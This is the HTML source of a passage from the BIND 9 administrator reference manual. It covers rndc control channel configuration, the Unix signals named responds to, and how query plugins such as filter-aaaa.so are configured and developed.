std std-option docutils literal notranslate"><span class="pre">rndc</span> <span class="pre">reload</span></code></a></p> <p>to connect to 127.0.0.1 port 953 and causes the name server to reload, if a name server on the local machine is running with the following controls statements:</p> <div class="highlight-default notranslate"><div class="highlight"><pre><span></span><span class="n">controls</span> <span class="p">{</span> <span class="n">inet</span> <span class="mf">127.0.0.1</span> <span class="n">allow</span> <span class="p">{</span> <span class="n">localhost</span><span class="p">;</span> <span class="p">}</span> <span class="n">keys</span> <span class="p">{</span> <span class="n">rndc_key</span><span class="p">;</span> <span class="p">};</span> <span class="p">};</span> </pre></div> </div> <p>and it has an identical key block for <code class="docutils literal notranslate"><span class="pre">rndc_key</span></code>.</p> <p>Running the <a class="reference internal" href="manpages.html#std-iscman-rndc-confgen"><code class="xref std std-iscman docutils literal notranslate"><span class="pre">rndc-confgen</span></code></a> program conveniently creates an <a class="reference internal" href="manpages.html#std-iscman-rndc.conf"><code class="xref std std-iscman docutils literal notranslate"><span class="pre">rndc.conf</span></code></a> file, and also displays the corresponding <a class="reference internal" href="reference.html#namedconf-statement-controls" title="namedconf-statement-controls"><code class="xref any namedconf namedconf-ref docutils literal notranslate"><span class="pre">controls</span></code></a> statement needed to add to <a class="reference internal" href="manpages.html#std-iscman-named.conf"><code class="xref std std-iscman docutils literal notranslate"><span class="pre">named.conf</span></code></a>. Alternatively, it is possible to run <a class="reference internal" href="manpages.html#cmdoption-rndc-confgen-a"><code class="xref std std-option docutils literal notranslate"><span class="pre">rndc-confgen</span> <span class="pre">-a</span></code></a> to set up an <code class="docutils literal notranslate"><span class="pre">rndc.key</span></code> file and not modify <a class="reference internal" href="manpages.html#std-iscman-named.conf"><code class="xref std std-iscman docutils literal notranslate"><span class="pre">named.conf</span></code></a> at all.</p> </dd></dl> </section> </section> <section id="signals"> <h2><span class="section-number">4.2. </span>Signals<a class="headerlink" href="#signals" title="Permalink to this headline"></a></h2> <p>Certain Unix signals cause the name server to take specific actions, as described in the following table. These signals can be sent using the <code class="docutils literal notranslate"><span class="pre">kill</span></code> command.</p> <table class="docutils align-default"> <colgroup> <col style="width: 19%" /> <col style="width: 81%" /> </colgroup> <tbody> <tr class="row-odd"><td><p><code class="docutils literal notranslate"><span class="pre">SIGHUP</span></code></p></td> <td><p>Causes the server to read <a class="reference internal" href="manpages.html#std-iscman-named.conf"><code class="xref std std-iscman docutils literal notranslate"><span class="pre">named.conf</span></code></a> and reload the database.</p></td> </tr> <tr class="row-even"><td><p><code class="docutils literal notranslate"><span class="pre">SIGTERM</span></code></p></td> <td><p>Causes the server to clean up and exit.</p></td> </tr> <tr class="row-odd"><td><p><code class="docutils literal notranslate"><span class="pre">SIGINT</span></code></p></td> <td><p>Causes the server to clean up and exit.</p></td> </tr> </tbody> </table> </section> <section id="plugins"> <span id="module-info"></span><h2><span class="section-number">4.3. </span>Plugins<a class="headerlink" href="#plugins" title="Permalink to this headline"></a></h2> <p>Plugins are a mechanism to extend the functionality of <a class="reference internal" href="manpages.html#std-iscman-named"><code class="xref std std-iscman docutils literal notranslate"><span class="pre">named</span></code></a> using dynamically loadable libraries. By using plugins, core server functionality can be kept simple for the majority of users; more complex code implementing optional features need only be installed by users that need those features.</p> <p>The plugin interface is a work in progress, and is expected to evolve as more plugins are added. Currently, only “query plugins” are supported; these modify the name server query logic. Other plugin types may be added in the future.</p> <p>The only plugin currently included in BIND is <a class="reference internal" href="manpages.html#std-iscman-filter-aaaa"><code class="xref std std-iscman docutils literal notranslate"><span class="pre">filter-aaaa.so</span></code></a>, which replaces the <code class="docutils literal notranslate"><span class="pre">filter-aaaa</span></code> feature that previously existed natively as part of <a class="reference internal" href="manpages.html#std-iscman-named"><code class="xref std std-iscman docutils literal notranslate"><span class="pre">named</span></code></a>. The code for this feature has been removed from <a class="reference internal" href="manpages.html#std-iscman-named"><code class="xref std std-iscman docutils literal notranslate"><span class="pre">named</span></code></a> and can no longer be configured using standard <a class="reference internal" href="manpages.html#std-iscman-named.conf"><code class="xref std std-iscman docutils literal notranslate"><span class="pre">named.conf</span></code></a> syntax, but linking in the <a class="reference internal" href="manpages.html#std-iscman-filter-aaaa"><code class="xref std std-iscman docutils literal notranslate"><span class="pre">filter-aaaa.so</span></code></a> plugin provides identical functionality.</p> </section> <section id="configuring-plugins"> <h2><span class="section-number">4.4. </span>Configuring Plugins<a class="headerlink" href="#configuring-plugins" title="Permalink to this headline"></a></h2> <dl class="namedconf statement"> <dt class="sig sig-object namedconf" id="namedconf-statement-plugin"> <span class="sig-name descname"><span class="pre">plugin</span></span><a class="headerlink" href="#namedconf-statement-plugin" title="Permalink to this definition"></a></dt> <dd><p><strong>Grammar: </strong><code class="docutils literal notranslate"><span class="pre">plugin</span> <span class="pre">(</span> <span class="pre">query</span> <span class="pre">)</span> <span class="pre"><string></span> <span class="pre">[</span> <span class="pre">{</span> <span class="pre"><unspecified-text></span> <span class="pre">}</span> <span class="pre">];</span> <span class="pre">//</span> <span class="pre">may</span> <span class="pre">occur</span> <span class="pre">multiple</span> <span class="pre">times</span></code></p> <p><strong>Blocks: </strong>topmost, view</p> <p><strong>Tags: </strong>server</p> <p><p>Configures plugins in <a class="reference internal" href="manpages.html#std-iscman-named.conf"><code class="xref std std-iscman docutils literal notranslate"><span class="pre">named.conf</span></code></a>.</p> </p> </dd></dl> <p>A plugin is configured with the <a class="reference internal" href="#namedconf-statement-plugin" title="namedconf-statement-plugin"><code class="xref any namedconf namedconf-ref docutils literal notranslate"><span class="pre">plugin</span></code></a> statement in <a class="reference internal" href="manpages.html#std-iscman-named.conf"><code class="xref std std-iscman docutils literal notranslate"><span class="pre">named.conf</span></code></a>:</p> <div class="highlight-default notranslate"><div class="highlight"><pre><span></span><span class="n">plugin</span> <span class="n">query</span> <span class="s2">"library.so"</span> <span class="p">{</span> <span class="n">parameters</span> <span class="p">};</span> </pre></div> </div> <p>In this example, file <code class="docutils literal notranslate"><span class="pre">library.so</span></code> is the plugin library. <code class="docutils literal notranslate"><span class="pre">query</span></code> indicates that this is a query plugin.</p> <p>Multiple <a class="reference internal" href="#namedconf-statement-plugin" title="namedconf-statement-plugin"><code class="xref any namedconf namedconf-ref docutils literal notranslate"><span class="pre">plugin</span></code></a> statements can be specified, to load different plugins or multiple instances of the same plugin.</p> <p><code class="docutils literal notranslate"><span class="pre">parameters</span></code> are passed as an opaque string to the plugin’s initialization routine. Configuration syntax differs depending on the module.</p> </section> <section id="developing-plugins"> <h2><span class="section-number">4.5. </span>Developing Plugins<a class="headerlink" href="#developing-plugins" title="Permalink to this headline"></a></h2> <p>Each plugin implements four functions:</p> <ul class="simple"> <li><p><code class="docutils literal notranslate"><span class="pre">plugin_register</span></code> to allocate memory, configure a plugin instance, and attach to hook points within <a class="reference internal" href="manpages.html#std-iscman-named"><code class="xref std std-iscman docutils literal notranslate"><span class="pre">named</span></code></a> ,</p></li> <li><p><code class="docutils literal notranslate"><span class="pre">plugin_destroy</span></code> to tear down the plugin instance and free memory,</p></li> <li><p><code class="docutils literal notranslate"><span class="pre">plugin_version</span></code> to check that the plugin is compatible with the current version of the plugin API,</p></li> <li><p><code class="docutils literal notranslate"><span class="pre">plugin_check</span></code> to test syntactic correctness of the plugin parameters.</p></li> </ul> <p>At various locations within the <a class="reference internal" href="manpages.html#std-iscman-named"><code class="xref std std-iscman docutils literal notranslate"><span class="pre">named</span></code></a> source code, there are “hook points” at which a plugin may register itself. When a hook point is reached while <a class="reference internal" href="manpages.html#std-iscman-named"><code class="xref std std-iscman docutils literal notranslate"><span class="pre">named</span></code></a> is running, it is checked to see whether any plugins have registered themselves there; if so, the associated “hook action” - a function within the plugin library - is called. Hook actions may examine the runtime state and make changes: for example, modifying the answers to be sent back to a client or forcing a query to be aborted. More details can be found in the file <code class="docutils literal notranslate"><span class="pre">lib/ns/include/ns/hooks.h</span></code>.</p> </section> </section> </div> </div> <footer><div class="rst-footer-buttons" role="navigation" aria-label="Footer"> <a href="chapter3.html" class="btn btn-neutral float-left" title="3. Configurations and Zone Files" accesskey="p" rel="prev"><span class="fa fa-arrow-circle-left" aria-hidden="true"></span> Previous</a> <a href="chapter5.html" class="btn btn-neutral float-right" title="5. DNSSEC" accesskey="n" rel="next">Next <span class="fa fa-arrow-circle-right" aria-hidden="true"></span></a> </div> <hr/> <div role="contentinfo"> <p>© Copyright 2025, Internet Systems Consortium.</p> </div> Built with <a href="https://www.sphinx-doc.org/">Sphinx</a> using a <a href="https://github.com/readthedocs/sphinx_rtd_theme">theme</a> provided by <a href="https://readthedocs.org">Read the Docs</a>. </footer> </div> </div> </section> </div> <script> jQuery(function () { SphinxRtdTheme.Navigation.enable(true); }); </script> </body> </html>
Close